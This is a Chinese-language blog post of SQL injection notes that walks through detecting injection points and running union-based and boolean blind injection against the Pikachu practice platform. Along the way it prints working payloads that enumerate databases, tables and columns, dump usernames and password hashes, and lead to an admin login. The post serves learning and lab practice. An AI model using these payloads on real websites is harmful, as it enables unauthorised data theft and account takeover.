<!DOCTYPE HTML>
<html lang="zh-CN">


<head><meta name="generator" content="Hexo 3.9.0">
    <!-- hexo-inject:begin --><!-- hexo-inject:end --><meta charset="utf-8">
    <meta name="keywords" content="SQL注入笔记, z1r0s 安全 渗透 编程">
    <meta name="description" content="z1r0s | 程序语言 | 网络安全 | 红蓝对抗">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>SQL注入笔记 | z1r0s</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery.min.js"></script>

<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"><!-- hexo-inject:begin --><!-- hexo-inject:end --></head>



   <style>
    body{
       background-image: url(/medias/bg.jpg);
       background-repeat:no-repeat;
       background-size:cover;
       background-attachment:fixed;
    }
</style>



<body>
    <!-- hexo-inject:begin --><!-- hexo-inject:end --><header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">z1r0s</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>留言板</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">z1r0s</div>
        <div class="logo-desc">
            
            z1r0s | 程序语言 | 网络安全 | 红蓝对抗
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			留言板
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/blinkfox/hexo-theme-matery" class="waves-effect waves-light" target="_blank">
                <i class="fab fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>


        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/blinkfox/hexo-theme-matery" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>

    
<script src="/libs/cryptojs/crypto-js.min.js"></script>
<script>
    (function() {
        let pwd = '9df936306f28221960380bb10b6a8e8f4dd68440ba011e1359aca651d016be86';
        if (pwd && pwd.length > 0) {
            if (pwd !== CryptoJS.SHA256(prompt('请输入访问本文章的密码')).toString(CryptoJS.enc.Hex)) {
                alert('密码错误，将返回主页！');
                location.href = '/';
            }
        }
    })();
</script>




<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/25.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">SQL注入笔记</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        padding-bottom: 30px;
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/Web漏洞/">
                                <span class="chip bg-color">Web漏洞</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fas fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="/categories/Web安全/" class="post-category">
                                Web安全
                            </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2020-09-07
                </div>
                

                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-check fa-fw"></i>更新日期:&nbsp;&nbsp;
                    2020-12-22
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    5.1k
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-clock fa-fw"></i>阅读时长:&nbsp;&nbsp;
                    21 分
                </div>
                

                
                    <div id="busuanzi_container_page_pv" class="info-break-policy">
                        <i class="far fa-eye fa-fw"></i>阅读次数:&nbsp;&nbsp;
                        <span id="busuanzi_value_page_pv"></span>
                    </div>
				
            </div>
        </div>
        <hr class="clearfix">

        

        
        <!-- 代码块折行 -->
        <style type="text/css">
            code[class*="language-"], pre[class*="language-"] { white-space: pre-wrap !important; }
        </style>
        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h1 id="SQL注入介绍"><a href="#SQL注入介绍" class="headerlink" title="SQL注入介绍"></a>SQL注入介绍</h1><p>&emsp;&emsp;<strong>SQL注入</strong>就是指Web应用程序对数据的合法性没有判断，前端传入后端的参数是攻击者可控的，并且将参数直接拼接成SQL语句带入数据库进行相关操作，攻击者可以通过构造不同的SQL语句来实现对数据库的任意操作。</p>
<p>&emsp;&emsp;一般情况下，程序开发者会使用动态SQL语句。动态SQL语句是在执行过程中构造的，它根据不同的条件产生不同的SQL语句，这种创建SQL语句的方式具有很大的灵活性。但动态创建SQL语句时，需要特别注意注入的产生，例如下面的PHP代码：</p>
<pre class=" language-php"><code class="language-php"><span class="token variable">$id</span><span class="token operator">=</span><span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token string">'id'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token variable">$query</span><span class="token operator">=</span><span class="token string">"select username,email from member where id=$id"</span><span class="token punctuation">;</span></code></pre>
<p>&emsp;&emsp;由于这里的的参数<code>id</code>可控，且带入数据库执行查询操作，所以非法用户可以拼接SQL语句对数据库进行恶意操作。例如当<code>id = -1 union select user(),database()#</code>时，在MySQL中执行的SQL语句如下：</p>
<pre class=" language-mysql"><code class="language-mysql">select username,email from member where id=-1 union select user(),database()#'</code></pre>
<center><img src="https://gitee.com/jixiansiwei/ImagesBed/raw/master/Security/Pentest/SQLInjection/注入语句在MySQL中的直接结果.png" alt="注入语句在MySQL中的直接结果"></center>



<h1 id="SQL注入原理"><a href="#SQL注入原理" class="headerlink" title="SQL注入原理"></a>SQL注入原理</h1><p>&emsp;&emsp;SQL注入漏洞的产生需要满足以下两个条件：</p>
<ul>
<li>参数用户可控：前端传给后端的参数内容是用户可以控制的。</li>
<li>参数参与数据库操作：传入的参数直接拼接到SQL语句后，带入数据库进行相关操作。</li>
</ul>
<h1 id="SQL注入步骤"><a href="#SQL注入步骤" class="headerlink" title="SQL注入步骤"></a>SQL注入步骤</h1><ol>
<li><strong>注入点判断</strong>。不同类别的网站注入点存在的位置也可能不一样，但其都有脱离不了一点就是与数据库进行交互，所以与数据库发生交互操作的功能点都有可能存在SQL注入，常出现注入点的位置有：新闻公告等查询处、用户注册处、用户登录处等等。</li>
<li><strong>判断SQL语句中的列数</strong>。注入点正常实现的数据往往不是我们想要得到的数据，通常我们需要使用<code>union</code>或报错等操作，使得此注入点显示的数据是我们想要得到的，但构造<font color="blue">我们需要的查询时必须要知道原SQL语句中的列数</font>，否则SQL执行时会发生错误。</li>
<li><strong>判断SQL语句操作的回显位置</strong>。使用<code>union</code>查询时我们需要找一个在前端显示的点，让我们查询到的数据显示出来，同样使用报错注入时也需要在前端显示我们想要得到的数据，所以需要先找到这样的一个点。</li>
<li><strong>构造SQL注入获取数据库指纹等</strong>。在爆数据库内部信息时，需要先得到数据库用户名、版本、数据库名称等消息，这会对我们的后续注入有很大的帮助。例如：MySQL数据库5.0版本之后和之前的注入操作会有些许差别，另外数据库信息对我们查找对应的<code>1day</code>有很大的帮助。</li>
<li><strong>构造SQL语句爆数据表名</strong>。对数据库进行爆破的最终目的是爆数据库字段值，但在爆字段值之前我们需要知道相对应的字段名和表名，因此开始正式爆破时，需要先得到数据库的表名信息。</li>
<li><strong>构造SQL语句爆字段名</strong>。在拿到数据库表名信息后，需要继续爆破表中的字段值，以判断哪些字段是我们想要得到的。</li>
<li><strong>构造SQL语句爆字段值</strong>。爆破的最终目的就是爆表中的字段值，再得到表名、字段名后就需要尝试爆我们想要得到的字段值。</li>
</ol>
<h1 id="注入点判断"><a href="#注入点判断" class="headerlink" title="注入点判断"></a>注入点判断</h1><p>&emsp;&emsp;在进行SQL注入时，首先需要判断是否存在注入点，而其利用的原理是使<strong>SQL语句在执行时发生语法错误</strong>或<strong>SQL语句的执行结果为空使其代码逻辑发生错误</strong>，通常通过以下几种方式来判断是否存在注入点(<font color="blue">成功一定存在，不成功可能存在</font>)：</p>
<h2 id="单引号判断"><a href="#单引号判断" class="headerlink" title="单引号判断"></a>单引号判断</h2><p>&emsp;&emsp;单引号判断注入点是否存在利用的是SQL语句在执行时发生语法错误。在SQL语法中<code>&#39;</code>必须成对存在否则在语句执行时会报语法错误，语句不能正常执行。下图是MySQL中的执行情况。</p>
<center><img src="https://gitee.com/jixiansiwei/ImagesBed/raw/master/Security/Pentest/SQLInjection/注入点判断-单引号引起的报错(MySQL).png" alt="注入点判断-单引号引起的报错(MySQL)"></center>

<p>当<code>&#39;</code>从前端传入时，应用程序执行结果为：</p>
<center><img src="https://gitee.com/jixiansiwei/ImagesBed/raw/master/Security/Pentest/SQLInjection/注入点判断-单引号注入(Response错误).png" alt="注入点判断-单引号注入(Response错误)"></center>

<p>而正常输入参数时应答报文如下所示：</p>
<center><img src="https://gitee.com/jixiansiwei/ImagesBed/raw/master/Security/Pentest/SQLInjection/注入点判断-单引号(正常Response).png" alt="注入点判断-单引号(正常Response)"></center>

<p>根据返回的报文结果可知，该点存在SQL注入。</p>
<p>&emsp;&emsp;<font color="red">此种方式判断注入点最是简单，也是最通用的，其主要依赖于单引号(<code>&#39;</code>)，若单引号被程序过滤或转义则这种方式将毫无用武之地</font>。</p>
<h2 id="Bool判断"><a href="#Bool判断" class="headerlink" title="Bool判断"></a>Bool判断</h2><p>&emsp;&emsp;Bool判断注入点是否存在利用的是SQL语句的执行结果为空使其代码发生逻辑错误。SQL语句操作时常常用<code>where</code>条件来限定操作的记录，<code>where</code>条件恒真或恒假时，返回报文是不同的。</p>
<p>当<code>id=8 and 1=1</code>时，<code>where</code>条件恒真，返回页面如下所示。</p>
<center><img src="https://gitee.com/jixiansiwei/ImagesBed/raw/master/Security/Pentest/SQLInjection/注入点判断-Bool判断(Responnse正常).png" alt="注入点判断-Bool判断(Responnse正常)"></center>

<p>当<code>id=8 and 1=2</code>时，<code>where</code>条件恒假，返回页面如下所示。</p>
<center><img src="https://gitee.com/jixiansiwei/ImagesBed/raw/master/Security/Pentest/SQLInjection/注入点判断-Bool判断(Response错误).png" alt="注入点判断-Bool判断(Response错误)"></center>

<p>​        此种方式判断注入点依赖于where条件和SQL语句执行结果(0或1)，不同的执行结果将在前端展示不同效果，所以此方式<font color="red">适用于SQL执行结果有两种或多种展示的情况</font>(即使<code>&#39;</code>被过滤也不影响该判断方式)。但是若SQL的执行结果只有一种回显，则此法也将失效。</p>
<h2 id="Time判断"><a href="#Time判断" class="headerlink" title="Time判断"></a>Time判断</h2><p>​        Time判断注入点是否存在适用于SQL执行结果只有一种回显，但没有过滤<code>slee()</code>函数的情况，利用消息的返回时间判断是否存在注入点。正常消息的反应时间较短，而执行了<code>sleep()</code>函数后消息的反应时间相对较长。</p>
<p>当<code>id = 1</code>时，消息返回时间较短，具体数据如下图所示。</p>
<center><img src="https://gitee.com/jixiansiwei/ImagesBed/raw/master/Security/Pentest/SQLInjection/注入点判断-Time判断(正常返回).png" alt="注入点判断-Time判断(正常返回)"></center>

<p>当<code>id = 1 and sleep(5)</code>时，消息的返回时间较长，与正常返回时间相差5秒左右。</p>
<center><img src="https://gitee.com/jixiansiwei/ImagesBed/raw/master/Security/Pentest/SQLInjection/注入点判断-Time判断(sleep).png" alt="注入点判断-Time判断(sleep)"></center>



<h1 id="Union注入"><a href="#Union注入" class="headerlink" title="Union注入"></a>Union注入</h1><p>​        <code>union</code>操作符用于合并两个或多个SQL语句，得到<strong>联合查询结果</strong>。以<code>pikachu</code>平台的数据库为例，输入<code>select id，email from member where username=&#39;vince&#39; union select username,pw from member where id=1;</code>查询结果如下：</p>
<pre class=" language-mysql"><code class="language-mysql">+-------+----------------------------------+
| id    | email                            |
+-------+----------------------------------+
| 1     | vince@pikachu.com                |
| vince | e10adc3949ba59abbe56e057f20f883e |
+-------+----------------------------------+
2 rows in set (0.00 sec)</code></pre>
<p>​        返回<code>pikachu</code>平台，在搜索型注入中，输入如下payload，出现如下报错。</p>
<p><code>v&#39; union select username,pw from member where id=1#%</code></p>
<img src="https://gitee.com/jixiansiwei/ImagesBed/raw/master/Security/Pentest/SQLli/直接在浏览中使用union查询时出现错误.png">

<p>​        出现上述报错的原因是<strong>union查询的字段不能超过主查询的字段数</strong>，这个时候可以在SQL语句后面加<strong><code>order by</code>子句</strong>，以此来判断主查询的字段数。</p>
<p><strong>使用<code>order by</code>子句来判断主查询中字段的个数</strong>：</p>
<ul>
<li>输入<code>v&#39; order by 4#%</code>，反馈如下图所示：</li>
</ul>
<img src="https://gitee.com/jixiansiwei/ImagesBed/raw/master/Security/Pentest/SQLli/union注入使用orderby子句判断主查询字段数.png">

<ul>
<li>输入<code>v&#39; order by 3#%</code>，反馈如下图所示：</li>
</ul>
<img src="https://gitee.com/jixiansiwei/ImagesBed/raw/master/Security/Pentest/SQLli/union注入使用orderby主句判断主查询字段个数2.png">

<ul>
<li>由以上操作判断出<strong>主查询有三个字段</strong>。</li>
</ul>
<p><strong>使用<code>union select</code>联合查询获取数据库指纹信息</strong>：</p>
<ul>
<li>之后我们来使用<code>union</code>来做一个SQL语句的拼接。构造payload：<code>v&#39; union select database(),user(),version()#%</code>，反馈结果如下图所示。</li>
</ul>
<img src="https://gitee.com/jixiansiwei/ImagesBed/raw/master/Security/Pentest/SQLli/union注入查询数据库名称用户名版本信息.png">

<ul>
<li>由上述操作我们得知数据库的版本是<code>5.5.53&gt;5.0</code>存在<code>information_schema</code>数据库。</li>
</ul>
<p><strong>union select联合查询结合<code>information_schema</code>查询网站所有库名</strong>:</p>
<ul>
<li>构造payload:<code>v&#39;union select table_schema,2,3 from information_schema.tables -- &#39;</code>，回显结果如下图所示。</li>
</ul>
<center><img src="https://gitee.com/jixiansiwei/ImagesBed/raw/master/Security/Pentest/SQLInjection/union注入获取所有库名称.png" alt="union注入获取所有库名称"></center>

<p><strong>union select联合查询结合<code>information_schema</code>查询<code>pikachu</code>数据库中的数据表</strong>:-</p>
<ul>
<li>构造payload：<code>v&#39;union select (select table_name from information_schema.tables where table_schema=&#39;pikachu&#39; limit 0,1),2,3  -- &#39;</code>，回显结果如下图所示。</li>
</ul>
<center><img src="https://gitee.com/jixiansiwei/ImagesBed/raw/master/Security/Pentest/SQLInjection/union注入-查询pikachu库中的表名.png" alt="union注入-查询pikachu库中的表名"></center>

<ul>
<li>此条payload使用<code>limit</code>将查询结果限制为一条，可以通过修改<code>limit</code>的参数来回显出用户数据表名。如：<code>v&#39;union select (select table_name from information_schema.tables where table_schema=&#39;pikachu&#39; limit 3,1),2,3  -- &#39;</code>，回显结果如下图所示。</li>
</ul>
<center><img src="https://gitee.com/jixiansiwei/ImagesBed/raw/master/Security/Pentest/SQLInjection/union注入-查询pikachu库的user表.png" alt="union注入-查询pikachu库的user表"></center>

<p><strong>union select联合查询结合<code>information_schema</code>查询<code>pikachu</code>数据库中的<code>users</code>数据表的字段名</strong>:</p>
<ul>
<li>构造payload：<code>v&#39;union select (select column_name from information_schema.columns where table_schema=&#39;pikachu&#39; and table_name=&#39;users&#39; limit 0,1),2,3  -- &#39;</code>，回显结果如下图所示。</li>
</ul>
<center><img src="https://gitee.com/jixiansiwei/ImagesBed/raw/master/Security/Pentest/SQLInjection/union注入-pikachu库users表字段查询.png" alt="union注入-pikachu库users表字段查询"></center>

<ul>
<li>此条payload使用<code>limit</code>将查询结果限制为一条，可以通过修改<code>limit</code>的参数来回显出用户名、密码等敏感信息。如：<code>v&#39;union select (select column_name from information_schema.columns where table_schema=&#39;pikachu&#39; and table_name=&#39;users&#39; limit 1,1),(select column_name from information_schema.columns where table_schema=&#39;pikachu&#39; and table_name=&#39;users&#39; limit 2,1),3  -- &#39;</code>，回显结果如下图所示。</li>
</ul>
<center><img src="https://gitee.com/jixiansiwei/ImagesBed/raw/master/Security/Pentest/SQLInjection/union注入-pikachu库users表username和password.png" alt="union注入-pikachu库users表username和password"></center>

<p><strong>union select联合查询结合<code>information_schema</code>查询<code>pikachu</code>数据库中的<code>users</code>数据表中<code>username</code>和<code>password</code>的值</strong>:</p>
<ul>
<li>构造payload：<code>v&#39;union select username,password,3 from users limit 0,1 -- &#39;</code>，回显结果如下图所示。</li>
</ul>
<center><img src="https://gitee.com/jixiansiwei/ImagesBed/raw/master/Security/Pentest/SQLInjection/union注入-pikachu库users表username和password字段值.png" alt="union注入-pikachu库users表username和password字段值"></center>

<p><strong>尝试爆破MD5</strong>:</p>
<ul>
<li>使用<a href="https://cmd5.com/" target="_blank" rel="noopener">在线md5</a>爆破得到<code>admin</code>用户密码为：<code>123456</code></li>
</ul>
<center><img src="https://gitee.com/jixiansiwei/ImagesBed/raw/master/Security/Pentest/SQLInjection/union注入-爆破得到admin用户密码.png" alt="union注入-爆破得到admin用户密码"></center>

<p><strong>尝试使用爆破的账号和密码登录后台</strong>：</p>
<center><img src="https://gitee.com/jixiansiwei/ImagesBed/raw/master/Security/Pentest/SQLInjection/union注入-union爆破登录后台.png" alt="union注入-union爆破登录后台"></center>

<h1 id="Boolean注入"><a href="#Boolean注入" class="headerlink" title="Boolean注入"></a>Boolean注入</h1><p>​        当系统不显示返回信息或当发生错误时将系统重定向到一个通用错误页面，这个上述使用过的SQL注入办法不能再使用。</p>
<p>​        盲注，即在SQL注入过程中，SQL语句执行选择后，选择的数据不能回显到前端，这就需要我们使用一些特殊的方法进行判断或尝试，这个过程称为盲注。</p>
<p>​        <strong>SQL盲注分为三大类</strong>：基于布尔型SQL盲注、基于时间型SQL盲注、基于报错型SQL盲注</p>
<p><strong>实战测试</strong>：    </p>
<ol>
<li><p><strong>爆数据库名称长度</strong></p>
<p>在检测数据库名称长度时，因为错误回显信息被屏蔽，但其发生错误时还是会有明显得特征，因此使用<code>length()</code>结合逻辑运算来判断数据库名称的长度值。</p>
<p>payload：<code>vince&#39; and length(database()) &lt; 3#</code>，其中<code>3</code>要不断变化以此来逼近数据库名称长度值。</p>
<img src="https://gitee.com/jixiansiwei/ImagesBed/raw/master/Security/Pentest/SQLli/Boolean盲注爆数据库名称长度.png">

<p>解析：</p>
<img src="https://gitee.com/jixiansiwei/ImagesBed/raw/master/Security/Pentest/SQLli/boolean盲注解析.png">

<p>拼接SQL语句为：</p>
<pre class=" language-mysql"><code class="language-mysql"># 爆数据库名称长度
select id,email from member where username='vince' and length(database()) < 3#'</code></pre>
</li>
</ol>
<ol start="2">
<li><p><strong>爆数据库名称</strong>（<font color="blue">一个字母一个字母得爆</font>）</p>
<p>获取数据库名称长度后，使用<code>substr()</code>和<code>ascii()</code>/<code>ord()</code>函数来逐个字母判断数据库的名称，可构造payload：</p>
<pre class=" language-mysql"><code class="language-mysql"># 直接匹配字符
vince' and substr(database(),1,1)='p'#

# 匹配字符的ASCII
vince' and ascii(substr(database(),1,1))=112#</code></pre>
<p>操作结果如下所示。</p>
<img src="https://gitee.com/jixiansiwei/ImagesBed/raw/master/Security/Pentest/SQLli/boolean盲注爆数据库名称.png">

<p>以此类推继续爆数据库名称为：<code>pikachu</code>。</p>
<p><strong>解析</strong>：</p>
<img src="https://gitee.com/jixiansiwei/ImagesBed/raw/master/Security/Pentest/SQLli/boolean盲注解析.png">

<p>拼接SQL语句为：</p>
<pre class=" language-mysql"><code class="language-mysql"># 爆数据库名称
select id,email from member where username='vince' and ascii(substr(database(),1,1))=112#'</code></pre>
</li>
<li><p><strong>爆数据表名称</strong></p>
<p>由以上操作得到数据库名称<code>pikachu</code>后，还要继续使用<code>substr()</code>和<code>ascii()</code>/<code>ord()</code>函数结合<code>union select</code>来爆数据表的名称信息。可构造payload如下：</p>
<pre class=" language-mysql"><code class="language-mysql"># 直接匹配字符
vince' and substr((select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),1,1)='p'#

# 匹配字符的ASCII
vince' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),1,1))=112#
vince' and ord(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),1,1))=112#</code></pre>
<p>操作结果如下图所示：</p>
<center><img src="https://gitee.com/jixiansiwei/ImagesBed/raw/master/Security/Pentest/SQLInjection/Boolean注入-爆数据表名称首字母h.png" alt="Boolean注入-爆数据表名称首字母h"></center>

<p>以此类推爆破得到表名为：<code>httpinfo</code>，不是我们想要的数据表，因此需要修改<code>limit</code>参数继续爆破表名。最后在<code>limit 3 1</code>处爆破得到<code>users</code>表。</p>
</li>
<li><p><strong>爆users表字段名称</strong></p>
<p>由以上操作得到数据表名称<code>users</code>后，还要继续使用<code>substr()</code>和<code>ascii()</code>/<code>ord()</code>函数结合<code>union select</code>来爆<code>users</code>的字段名称。可构造payload如下：</p>
<pre class=" language-mysql"><code class="language-mysql"># 直接匹配字符
vince' and substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 0,1),1,1)='p'#

# 匹配字符的ASCII
vince' and ascii(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 0,1),1,1))=112#
vince' and ord(substr((select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 0,1),1,1))=112#</code></pre>
<p>操作结果如下图所示：</p>
<center><img src="https://gitee.com/jixiansiwei/ImagesBed/raw/master/Security/Pentest/SQLInjection/Boolean注入-爆数据表字段名称.png" alt="Boolean注入-爆数据表字段名称"></center>

<p>以此类推爆破得到字段名为：<code>id</code>，不是我们在意的数据，因此需要修改<code>limit</code>参数继续爆破字段名。最后在<code>limit 1 1</code>处爆破得到<code>username</code>字段名，在<code>limit 2 1</code>处爆破得到<code>password</code>字段名。</p>
</li>
<li><p><strong>爆users表字段值</strong></p>
<p>由以上操作得知<code>users</code>表存在<code>username</code>和<code>password</code>字段后，还要继续使用<code>substr()</code>和<code>ascii()</code>/<code>ord()</code>函数结合<code>union select</code>来爆<code>users</code>的字段名称。可构造payload如下：</p>
<pre class=" language-mysql"><code class="language-mysql"># 直接匹配字符
vince' and substr((select username from users limit 0,1),1,1)='p'#

# 匹配字符的ASCII
vince' and ascii(substr((select username from users limit 0,1),1,1))=112#
vince' and ord(substr((select username from users limit 0,1),1,1))=112#</code></pre>
<p>操作结果如下图所示：</p>
<center><img src="https://gitee.com/jixiansiwei/ImagesBed/raw/master/Security/Pentest/SQLInjection/Boolean注入-爆admin用户名.png" alt="Boolean注入-爆admin用户名"></center>

